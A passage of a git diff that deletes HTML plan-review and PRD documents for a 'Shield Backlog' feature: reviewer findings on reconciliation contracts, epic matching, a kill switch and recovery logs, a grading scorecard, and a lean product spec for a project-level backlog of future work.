  • Tasks: shield/scripts/reconcile_backlog.py; never-remove-on-doubt; drift tolerance with logged warning; log every removal {entry id, feature, epic, match-kind, triggering run, gating plan.json path}. -
      -
    • [P0-2 — fix] Match key: existing epic by normalized name (NOT by EPIC-N id — ids are positional slots reassigned on every re-/plan, so id-matching breaks across re-plans). Proposed-new also by normalized name. EPIC-N is only a within-one-plan disambiguator. Story status never consulted.
    • -
    • [P0-1 — fix] reconcile(entry, *, manifest: dict, plans: dict[str,dict]) -> RemovalDecision, where manifest is the parsed {schema_version, features:[...]} and plans maps feature-slug → parsed plan.json (path derived, not stored). Define the RemovalDecision dataclass carrying the F9 log fields [P2].
    • -
    -
  • -
  • AC: removed only when an epic with normalized-exact name is present in plan.json.epics[] (story status not consulted); prd-only not removed; epic-name collision across two features → ambiguous → stays; an epic reordered across a re-plan still resolves correctly; malformed/old shapes → stays (logged), no exception; every removal emits the structured log line.
  • -
  • Design: TRD §7 High-Level Design · LLD reconciler §6 Sequence flows
  • -
-
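To make the P0-1 and P0-2 fixes concrete, the sketch below derives `plans` from the manifest and applies an "epic landed" check by normalized name. It is an illustration under assumptions: the epic key `name`, the helper names `load_plans` and `epic_landed`, and the exactly-one-match rule for ambiguity are not confirmed by the source.

```python
import json
import os


def normalize(name: str) -> str:
    return " ".join(name.casefold().split())


def load_plans(manifest: dict, root: str = "docs/shield") -> dict:
    """Map feature slug -> parsed plan.json; the path is derived, never stored."""
    plans = {}
    for feature in manifest.get("features", []):
        if feature.get("artifacts", {}).get("plan_json") is True:
            path = os.path.join(root, feature["name"], "plan.json")
            try:
                with open(path, encoding="utf-8") as handle:
                    plans[feature["name"]] = json.load(handle)
            except (OSError, ValueError):
                continue  # unreadable plan counts as "no plan": entry stays
    return plans


def epic_landed(entry: dict, plans: dict) -> bool:
    """True only when exactly one epic in the feature's plan matches by name."""
    plan = plans.get(entry.get("feature"))
    if not isinstance(plan, dict) or not isinstance(plan.get("epics"), list):
        return False  # malformed or old shape: never remove on doubt
    wanted = normalize(entry.get("epic") or "")
    if not wanted:
        return False
    names = [normalize(epic["name"]) for epic in plan["epics"]
             if isinstance(epic, dict) and isinstance(epic.get("name"), str)]
    return names.count(wanted) == 1  # zero or several matches: stays
```

Matching on the name rather than the `EPIC-N` id is what lets an epic that moved from slot 2 to slot 1 across a re-plan still resolve.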

EPIC-3-S3 · Eager + lazy removal triggers (idempotent) + kill switch (high)

-

Eager prune at the end of a promoted /plan or /implement run; lazy sweep on view. Both idempotent; both call the one engine. Lands after S1 + S2.

-
    -
  • Tasks: eager prune hook; lazy sweep; idempotent remove-if-present + shared engine; debug-gated latency line. -
      -
    • [P0-3 — fix] Extend shield/schemas/shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + a config example — the current schema has additionalProperties: false, so the kill switch fails validation without this. (Reflected in the EPIC-4-S2 version bump.)
    • -
    • [P1-1 (agile/sre) — fix] Resolve the N4 recovery OR: v1 default = .shield/backlog-removed.log (append the entry before the destructive remove); commit-before-prune is an explicit non-goal. Update TRD §6 N4 + §14 step 2 to name the single mechanism.
    • -
    • [P2 — sre] Drop "independently" (one coupled boolean); surface "N entries removed since last view (see backlog-removed.log)" on view; define the removed-log lifecycle (gitignored, append-only, manual rotation); specify "no-op prune emits no log line"; state the N2 WARN threshold (">1s").
    • -
    -
  • -
  • AC: eager prune removes the referenced entry at end of run; lazy sweep removes plan-committed entries; second pass is a no-op (idempotent); shared engine; backlog.auto_reconcile=false (now schema-valid) disables both; an end-of-run prune appends to .shield/backlog-removed.log before the remove; replaying the log restores the entry; debug latency line reports view+sweep wall time.
  • -
  • Design: TRD §7 High-Level Design · LLD reconciler §8 Concurrency & state
  • -
-
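The append-before-remove ordering and log replay described for `.shield/backlog-removed.log` can be sketched as below. The JSON-lines record format and the function names `prune_with_log` and `replay_log` are assumptions; the plan only fixes the ordering and the F9 fields.

```python
import json
import os


def prune_with_log(doc: dict, entry_id: str, log_path: str, rationale: dict) -> bool:
    """Append the entry to the removed-log, then drop it from the document."""
    entry = next((e for e in doc["entries"] if e["id"] == entry_id), None)
    if entry is None:
        return False  # idempotent no-op: nothing removed, no log line emitted
    record = dict(rationale, entry=entry)
    with open(log_path, "a", encoding="utf-8") as log:
        log.write(json.dumps(record) + "\n")
        log.flush()
        os.fsync(log.fileno())  # the log line is durable before the remove
    doc["entries"] = [e for e in doc["entries"] if e["id"] != entry_id]
    return True


def replay_log(doc: dict, log_path: str) -> int:
    """Restore logged entries that are missing from doc; return how many."""
    present = {e["id"] for e in doc["entries"]}
    restored = 0
    with open(log_path, encoding="utf-8") as log:
        for line in log:
            entry = json.loads(line)["entry"]
            if entry["id"] not in present:
                doc["entries"].append(entry)
                present.add(entry["id"])
                restored += 1
    return restored
```

Because the log line is written first, a crash between the append and the remove leaves the entry in both places, and replay skips ids that are already present instead of duplicating them.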
-

EPIC-4 — Eval coverage & release (M3)

-

EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) (high)

-
    -
  • Tasks: fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays via epic-name collision, malformed-stays, re-planned-epic-reorder-still-resolves, manifest-from-real-schema); evals for each behavior incl. duplicate-id rejection. -
      -
    • [P1-1 — fix] Concurrency eval asserts detection: a concurrent on-disk change between read and replace is refused (BacklogInvalid), no lost entry — not a race the design forbids.
    • -
    • [P1 (security P1-b) — fix] Write-side eval: capture() producing a schema-invalid doc raises BacklogInvalid and leaves backlog.json byte-unchanged (no .tmp promoted).
    • -
    • [P1 (security P1-c) — fix] Recovery-rehearsal eval asserts recoverability across a crash at the ordering seam (after log-append/before remove).
    • -
    • no-stamping eval (F6): plan.json + story records byte-unchanged after promotion.
    • -
    • [P1 / DX P1 — fix] Name the concrete CI entrypoint (the actual workflow file + runner under shield/evals/ or .github/workflows/), not a task; path-filter glob shield/{schema,scripts,skills/general/backlog}/**, shield/commands/backlog.md.
    • -
    -
  • -
  • AC: suite covers all listed behaviors (incl. compare-before-replace detection, write-side refusal, ordering-seam recovery, re-plan epic-reorder); self-contained (no API/LLM); PR body has RED + GREEN; named CI runner runs on the glob.
  • -
  • Design: TRD §10 Milestones
  • -
-

EPIC-4-S2 · Version bump + command/skill docs (medium)

-
    -
  • Tasks: bump marketplace.json + backlog_store pyproject.toml (now unconditional per P1-4); finalize command/skill docs (capture, three triggers, kill switch, match key, manual remove, badges, wrong-removal recovery procedure); commit the shield.schema.json backlog change (P0-3); document a fixed audit interval + numeric trigger (PRD §7 thresholds); explicit DoD lines; CHANGELOG. -
      -
    • [P2 — PM] Add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); add coarse effort/impact per milestone (PM4); quantify the v1-audit target (PM10).
    • -
    -
  • -
  • AC: version bumped in same commit (incl. schema change); SKILL.md documents capture/view/promote/remove + 3 triggers + kill switch + audit cadence + recovery procedure; explicit DoD lines present; CHANGELOG mentions the feature.
  • -
  • Design: TRD §13 References
  • -
-
-

Carried forward + validate-the-bet

-
    -
  • The prior PRD-review carry-forwards (capture interface, schema_version, drift tolerance, idempotency) remain folded (EPIC-1-S1/S2, EPIC-3-S2/S3).
  • -
  • PM10 decision unchanged: ship M1, validate the bet from backlog.json's 30-day git history before investing in M2/M3.
  • -
-

Next steps

-
    -
  • Fold the 3 P0s (+ the P1s) in one editing pass on TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S2/S3, EPIC-1-S1/S2, EPIC-4-S1/S2. No story restructuring needed.
  • -
  • Re-run /plan-review to confirm the P0s clear, then /pm-sync and /implement from M1.
  • -
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html deleted file mode 100644 index d955a64a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html +++ /dev/null @@ -1,206 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -

Plan Review — Shield Backlog (backlog-20260527)

-

Date: 2026-05-29 · Run: 1 · Source PRD: prd.md (type: lean) · Plan: plan.md + trd.md + plan.json (schema 1.5)
Reviewers: dx-engineer, agile-coach, backend-engineer, sre, security-engineer, product-manager (PM1–PM10)

-
-

✅ Resolution (applied 2026-05-29): the user chose "Apply P0+P1 to the plan." All 3 P0 and 8 P1 findings have been folded into the canonical artifacts (plan.json, trd.md, the 3 LLD drafts) and shield/schemas/shield.schema.json (additive backlog object). Re-validation: validate_plan.py ✅, validate_trd.py ✅ (milestone-drift clean), kill-switch .shield.json validates ✅, all 3 LLD drafts structurally ✅. The plan is now clear for /implement. See plan.json metadata.plan_review_2026_05_29.{p0_applied,p1_applied} for the per-finding trace. The findings below are retained as the review record.

-
-

Verdict: Ready — composite 3.49 (B+) ⚠️ (3 P0 + 8 P1 since applied — see Resolution above)

-

The re-plan is a clear improvement on the prior run (3.14 → 3.49): the deferred TRD landed, schema is 1.5, and the prior P0 (gate-0d duplication) + the SRE/Security P1 set are verifiably folded in. However, the backend reviewer — checking the design against the live Shield schemas rather than only against itself — surfaced 3 P0 contract defects that each break a core path at implementation time. The weighted composite lands in "Ready" range, but the P0s gate /implement. All three are localized contract-pinning fixes, not design rework.

-

Scorecard

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
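| Persona | Weight | Grade | Numeric |
|---|---|---|---|
| DX Engineer | 1.0 | A− | 3.7 |
| Backend Engineer | 1.0 | B− | 2.7 |
| Security Engineer | 1.0 | A− | 3.7 |
| Agile Coach | 0.7 | A− | 3.7 |
| SRE / Operations | 0.7 | A− | 3.7 |
| Product Manager (PM1–PM10 avg) | 0.7 | A | 3.6 |
| Composite | | B+ | 3.49 → Ready |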
-

PM dim grades: PM1 A · PM2 A · PM3 A · PM4 B · PM5 B · PM6 B · PM7 A · PM8 A · PM9 A · PM10 B → avg 3.6.

-
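The scorecard arithmetic can be reproduced as a weighted mean, which is a quick way to check the composite. The sketch assumes A = 4.0 and B = 3.0 for the PM dimension grades (consistent with the 3.6 average shown) and assumes the composite is the weight-normalized mean of the numeric column; neither formula is stated in the review itself.

```python
# Assumed letter-to-number mapping for the PM dimension grades.
GRADE_POINTS = {"A": 4.0, "B": 3.0}

pm_dims = ["A", "A", "A", "B", "B", "B", "A", "A", "A", "B"]  # PM1..PM10
pm_avg = sum(GRADE_POINTS[g] for g in pm_dims) / len(pm_dims)

# (persona, weight, numeric grade) as listed in the scorecard.
scorecard = [
    ("DX Engineer", 1.0, 3.7),
    ("Backend Engineer", 1.0, 2.7),
    ("Security Engineer", 1.0, 3.7),
    ("Agile Coach", 0.7, 3.7),
    ("SRE / Operations", 0.7, 3.7),
    ("Product Manager", 0.7, pm_avg),
]

weighted_sum = sum(weight * score for _, weight, score in scorecard)
total_weight = sum(weight for _, weight, _ in scorecard)
composite = weighted_sum / total_weight

print(round(pm_avg, 2))     # 3.6
print(round(composite, 2))  # 3.49
```

Written out: (3.7 + 2.7 + 3.7) × 1.0 + (3.7 + 3.7 + 3.6) × 0.7 = 10.1 + 7.7 = 17.8, and 17.8 / 5.1 ≈ 3.49.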

Deterministic gates (run before dispatch)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Gate | Result |
|---|---|
| 0a schema (validate_plan.py) | ✅ exit 0 |
| 0b TRD sections (validate_trd.py) | ✅ exit 0 (incl. milestone-drift) |
| 0c stale anchors | ✅ none |
| 0d PRD↔TRD duplication (§2/§5) | ✅ 6-char / 3-char overlap (≤80) — prior P0 resolved |
| 0e impl-manual (§7 fence >20 lines) | ⚠️ §7 ASCII diagram is 27 lines, but §8 has 5 populated alternatives → escape satisfied (not P0) |
| 0f touches_lld_drift | |
| 0g lld_components_integrity | |
| 0h undocumented_lld | n/a — no canonical docs/lld/ (all net-new) |
| 0i lld_draft_review (3 drafts) | ✅ all 14 always-on + 8 forced subsections present, no vague TBDs |
-

P0 — Blockers (fix before /implement)

-

All three independently verified against live schemas (shield/schemas/{shield,plan}.schema.json, docs/shield/manifest.json).

-
    -
  1. Reconciler/suggester contracts don't match the real manifest.json/plan.json shapes (backend P0-1). manifest.json is {schema_version, features:[{name, artifacts:{…plan_json: bool…}, reviews, updated}]} — a list keyed by name, with a boolean plan_json flag and no stored plan path. reconcile(entry, *, manifest, plans) (lld-reconciler §5) never defines plans and never says the path must be derived. Fix: pin the real shapes; define plans: dict[slug→plan] populated by reading docs/shield/<feature>/plan.json for each feature with artifacts.plan_json == true; add a fixture from the actual manifest schema. (Also covers DX P1 manifest read-contract.)
  2. Existing-epic matching keys off a positional slot, not an identity (backend P0-2). Epic ids are EPIC-N slugs assigned by /plan (EPIC-2 = different epics in different plans, verified). After any re-/plan, an existing-epic entry stamped EPIC-2 matches the wrong epic or rots. Fix: match existing epics by normalized name too (same predicate as proposed-new); treat EPIC-N only as a within-one-plan disambiguator; add an "epic reordered across a re-plan" eval.
  3. Kill switch backlog.auto_reconcile is unshippable under the current .shield.json schema (backend P0-3). shield.schema.json has additionalProperties: false and no backlog key; adding the flag fails validation, and no story includes the schema change. Fix: add a task+AC (EPIC-3-S3, version-bump in EPIC-4-S2) extending shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + config example. Without it the documented first-line rollback (TRD §14) cannot ship.
-
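The P0-1 fix can be illustrated with a small sketch that derives `plans` from the manifest shape quoted above. The helper name `load_plans` and the `shield_root` parameter are hypothetical. Only the `features[].name` and `artifacts.plan_json` keys and the `docs/shield/<feature>/plan.json` path come from the review, and the sketch assumes the feature name equals the folder slug (the invariant P1 asks to pin).

```python
import json
from pathlib import Path


def load_plans(shield_root: Path) -> dict[str, dict]:
    """Build {feature name -> parsed plan.json} for features flagged plan_json == true.

    Hypothetical helper: the plan path is derived from the feature name,
    because the manifest stores a boolean flag, not a path.
    """
    manifest = json.loads((shield_root / "manifest.json").read_text(encoding="utf-8"))
    plans: dict[str, dict] = {}
    for feature in manifest.get("features", []):
        # Only an explicit boolean true counts; missing or false means "no plan".
        if feature.get("artifacts", {}).get("plan_json") is not True:
            continue
        plan_path = shield_root / feature["name"] / "plan.json"
        # A flag without a file is treated as "no plan" rather than an error.
        if not plan_path.is_file():
            continue
        plans[feature["name"]] = json.loads(plan_path.read_text(encoding="utf-8"))
    return plans
```

A reconciler built on this would receive `load_plans(Path("docs/shield"))` as its `plans` argument. Skipping a flagged feature whose file is missing is one possible policy, chosen here so that reconciliation never removes an entry on incomplete data.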

P1 — Should fix for plan quality

-
  1. Resolve the EPIC-3-S3 N4 recovery OR (agile AC7 + sre P1-1). AC5 encodes "commit-before-prune or removed-log" — not writable as one test, and the §14 runbook can't be precise. Pick one v1 default (recommend .shield/backlog-removed.log — avoids forcing a possibly-dirty-tree commit on every prune, decouples recovery from git state mid-/implement); make the other a non-goal.
  2. Add lost-update detection (compare-before-replace) (backend P1-1 + security P1-a). The concurrency eval tests a race the single-writer design forbids, and N5, if silently violated, yields a silent lost update. Have capture()/remove() carry the schema_version+entry-count (or mtime/hash) read at start and refuse os.replace() if the file changed underneath — a loud BacklogInvalid instead of a lost entry, no lockfile. Then the eval tests a real, detectable behavior.
  3. Reword "schema rejects duplicate id" → validator (backend P1-2). JSON Schema 2020-12 can't express property-level array uniqueness; F2 + EPIC-1-S1 AC must say validate_backlog.py enforces it (duplicate_entry_id).
  4. Pin the feature name == folder-slug invariant (backend P1-3). suggest_feature returns manifest features[].name, but the reconciliation key is the folder slug; if they differ, suggestion proposes an unresolvable value. Document the invariant + add a "suggested value resolves to an existing docs/shield/<value>/" fixture.
  5. Resolve the packaging model (backend P1-4). F3 ("every capturing skill builds against this signature") implies an importable module; EPIC-4-S2 hedges. Decide at plan time — package backlog_store with a pyproject.toml so the version bump is unconditional; document the import path skills use.
  6. Resolve the CI entrypoint to a concrete value (dx P1). EPIC-4-S1 still phrases the runner as a task; name the actual workflow file + runner so the eval-gate AC is verifiable.
  7. Add a write-side validation eval (security P1-b). "validate-or-refuse on read/write" is asserted but only read-side + crash-mid-write are tested. Add: capture() producing a schema-invalid doc raises BacklogInvalid and leaves backlog.json byte-unchanged.
  8. Test the recovery ordering seam (security P1-c). Strengthen the recovery-rehearsal eval to assert recoverability across a crash between log-append and remove (and between remove and commit), not just after a clean wrong-removal.
-
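The compare-before-replace idea in the lost-update item can be sketched as follows, using the hash variant the review lists as an option. The function names `read_with_token` and `replace_if_unchanged` are hypothetical; `BacklogInvalid` is the exception name the review uses, but its real definition is not shown in this patch. The write path also folds in the fsync and unique temp-name suggestions from the backend P2 notes.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path


class BacklogInvalid(Exception):
    """Stand-in for the store's error type; raised instead of overwriting silently."""


def read_with_token(path: Path) -> tuple[dict, str]:
    """Return the parsed document plus a content hash taken at read time."""
    raw = path.read_bytes()
    return json.loads(raw), hashlib.sha256(raw).hexdigest()


def replace_if_unchanged(path: Path, doc: dict, token: str) -> None:
    """Write doc over path only if the file still matches the hash read earlier."""
    current = hashlib.sha256(path.read_bytes()).hexdigest()
    if current != token:
        raise BacklogInvalid(f"{path.name} changed since it was read; refusing to overwrite")
    # Unique temp file in the same directory so os.replace stays on one filesystem.
    fd, tmp = tempfile.mkstemp(dir=str(path.parent), prefix=path.name + ".", suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            json.dump(doc, fh, indent=2)
            fh.flush()
            os.fsync(fh.fileno())  # make the bytes durable before the rename
        os.replace(tmp, path)
    except BaseException:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise
```

This narrows the race but does not close it: another writer could still change the file between the hash check and `os.replace`. Under the single-writer assumption the review describes, that is likely acceptable, since the goal is a loud failure when the assumption is violated, not a lock.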

P2 — Nice to have

-
  • DX: fixed audit interval + numeric trigger (not "e.g. monthly"); state runtime prereqs (Python/uv, pydantic+jsonschema) once in SKILL.md; label the 3.12 (PRD-review) vs 3.14 (plan-review) composites inline.
  • Agile: consider splitting EPIC-3-S3 into S3a (triggers) + S3b (kill switch + recovery + latency); note EPIC-2 deliberately straddles M1/M2; state the N2 WARN threshold (">1s").
  • SRE: drop "independently" from the kill-switch description (it's one coupled boolean); add a "N entries removed since last view" notice so wrong-removals aren't pull-only; define the removed-log lifecycle (tracked vs gitignored, rotation); require the wrong-removal recovery procedure in SKILL.md; specify no-op-prune logging.
  • Backend: add os.fsync() + a unique .tmp suffix; consider read() -> BacklogDoc (pydantic) over raw dict; define the RemovalDecision dataclass (the F9 log fields).
  • Security: give .shield/backlog-removed.log a schema/parser + tracked-status decision; make dry-run/fixture mode provably non-destructive (force sweep off) + eval it; add a forward note that a future migrate() must be validate-or-refuse.
  • PM: add coarse effort/impact per milestone (PM4); add a plain-language stakeholder/executive summary to the PRD (PM5); make the buy-vs-build case vs ClickUp/Jira explicit (PM6); quantify the operational cost the tool recovers as a falsifiable v1-audit target (PM10).
-

Detailed agent findings

- -

Recommendation

-

The plan is Ready in substance — strong scope discipline, testable ACs, an acyclic milestone DAG, clean trust boundaries, and an honest threat model. But do not start /implement until the 3 P0 contract fixes land: they are the difference between a plan that reads consistently and one whose reconciler, epic-matching, and kill switch actually work against the real Shield artifacts. The P1s (recovery-mechanism choice, lost-update detection, packaging) are best folded in the same revision pass. Estimated effort: one focused editing pass on the TRD §11/§5, the reconciler/epic-suggester LLDs, EPIC-3-S3, and EPIC-4-S1/S2 — no story restructuring required.

- -
-
Generated by Shield
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
deleted file mode 100644
index d2253360..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/enhanced-prd.html
+++ /dev/null
@@ -1,316 +0,0 @@
-Shield PRD Review
Shield PRD Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/prd/2026-05-27/)
-

Shield Backlog

- -

1. Header

| Field | Value |
| --- | --- |
| Owner | @ashwinimanoj |
| Status | Draft |
| PRD type | Lean |
| Date created | 2026-05-27 |
| Last updated | 2026-05-27 |
| Linked design spec | null |
| Linked research | null |
| Decision-maker | @ashwinimanoj |
| Sign-off contacts | (n/a for internal tooling) |
| Linked plans | (auto-populated by /plan) |
- -

2. Terminologies

| Term | Definition |
| --- | --- |
| Backlog | A project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json. |
| Backlog entry | One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a source (user \| agent), and a feature + epic association (either may be proposed-new until promotion). |
| Feature association | The feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion. |
| Epic association | The epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed only when this epic's work appears in the feature's plan.json. |
| Promotion | Acting on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route. |
| Reconciliation | Keeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan). A prd-only feature does not trigger removal. |
| Agent-discovered entry | A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry). |
- - -

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

- -

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
- -

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

- -

4. Target users / personas

| ID | Persona | Goals | Frictions today |
| --- | --- | --- | --- |
| P1 | Developer/PM driving Shield | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered "later" list at the project level |
| P2 | The agent (Claude) running a Shield task | Record follow-up work it discovers mid-task so the human doesn't have to remember it | Discovered work is mentioned once in chat then forgotten; no place to persist it |
- -

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only plan-committed work is removed. No ids are tracked.

- - -
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile:<br/>epic's work in feature's plan.json<br/>→ remove from backlog"]
-  plan --> rec
-  rec --> bl
-
-
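The `/backlog` view described in this section (ordered entries plus a per-entry pipeline status read from manifest.json) might look roughly like the sketch below. Everything about the entry shape is an assumption for illustration: the `entries`, `order`, `title`, `source`, `feature`, and `epic` keys, and the `research` and `prd` artifact flags, are hypothetical. Only `features[].name` and `artifacts.plan_json` appear elsewhere in this patch.

```python
from typing import Any

# (label shown to the user, assumed artifact flag in manifest.json)
STAGE_KEYS = (("research", "research"), ("prd", "prd"), ("plan", "plan_json"))


def pipeline_status(feature: str, manifest: dict[str, Any]) -> str:
    """Summarise which pipeline stages the manifest records for a feature."""
    for item in manifest.get("features", []):
        if item.get("name") == feature:
            artifacts = item.get("artifacts", {})
            done = [label for label, key in STAGE_KEYS if artifacts.get(key)]
            return "/".join(done) if done else "none"
    # Feature is proposed-new or otherwise absent from the manifest.
    return "not started"


def render_backlog(backlog: dict[str, Any], manifest: dict[str, Any]) -> list[str]:
    """Return one display line per entry, sorted by the explicit order field."""
    entries = sorted(backlog.get("entries", []), key=lambda e: e["order"])
    return [
        f'{e["order"]}. {e["title"]} [{e["source"]}] {e["feature"]} / {e["epic"]}'
        f' ({pipeline_status(e["feature"], manifest)})'
        for e in entries
    ]
```

The view only reads the manifest. It never opens plan.json, which keeps status display separate from the removal decision made by reconciliation.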

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: when an entry's work appears in a feature's plan.json, the entry is removed automatically, so the backlog reflects only not-yet-planned work.
  • -
- -

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists in the backlog until its work lands in a plan.json, at which point it is removed. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
- -

7. Success metrics

| Metric | Type | Target | Counter |
| --- | --- | --- | --- |
| Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot | Outcome | Majority of entries reach a terminal state (promoted/landed in a plan, or explicitly dropped) rather than rotting | Entries pile up un-triaged → backlog becomes a graveyard |
| Entries carrying a feature + epic association at promotion time | Quality | 100% — promotion cannot complete without a feature and epic | Forcing association makes capture so heavy nobody captures |
| Agent feature/epic-suggestion acceptance | Quality | Suggested feature/epic accepted often enough to save manual lookup | Bad suggestions that users routinely override |
| Capture friction | Adoption | Capturing an entry mid-task takes one step and does not interrupt the current task | Capture is so quick the backlog fills with low-signal noise |
- - -

8. Milestones

| ID | Name | Outcome | Exit criteria | Depends on |
| --- | --- | --- | --- | --- |
| M1 | Capture + store + view | A global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.json | backlog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json | |
| M2 | Feature + epic association + suggestion | Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic | Capture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-new | M1 |
| M3 | Promotion + reconciliation | The user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlog | Reconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?) — no ids stamped; a prd-only feature is not removed; /backlog reconciles on view; the user-chosen step is never overridden | M2 |
- - -

9. Open questions

- -
    -
  • Feature/epic discovery scope. manifest.json lists features (the reconciliation key). Epics still live inside per-feature plan.json files, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; revisit if a project-level epic index is ever needed.)
  • -
  • Reconciliation matching (resolved): no ids are stamped. An entry references a feature (matched against manifest.json) and an epic (confirmed in that feature's plan.json). The entry is removed only once its epic's work appears in the plan — a prd-only feature is not removed. Open: does reconciliation run on /backlog view, at the end of /plan, or both? (Leaning: on /backlog view, since the user drives promotion.)
  • -
- -
    -
  • Ordering scheme. Single global rank (explicit integer order, like orderindex), priority buckets (P0/P1/P2), or both? (Leaning: explicit order field for v1.)
  • -
  • Entry granularity. The ask says "epics/stories/tasks." Do we model a kind field, or treat every entry uniformly as "future work that becomes ≥1 story on promotion"? (Leaning: a kind hint, but promotion always yields stories.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see Out of scope.)
  • -
- -

10. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • A rejected/dropped lifecycle state and the audit trail for declined ideas.
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
- -
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
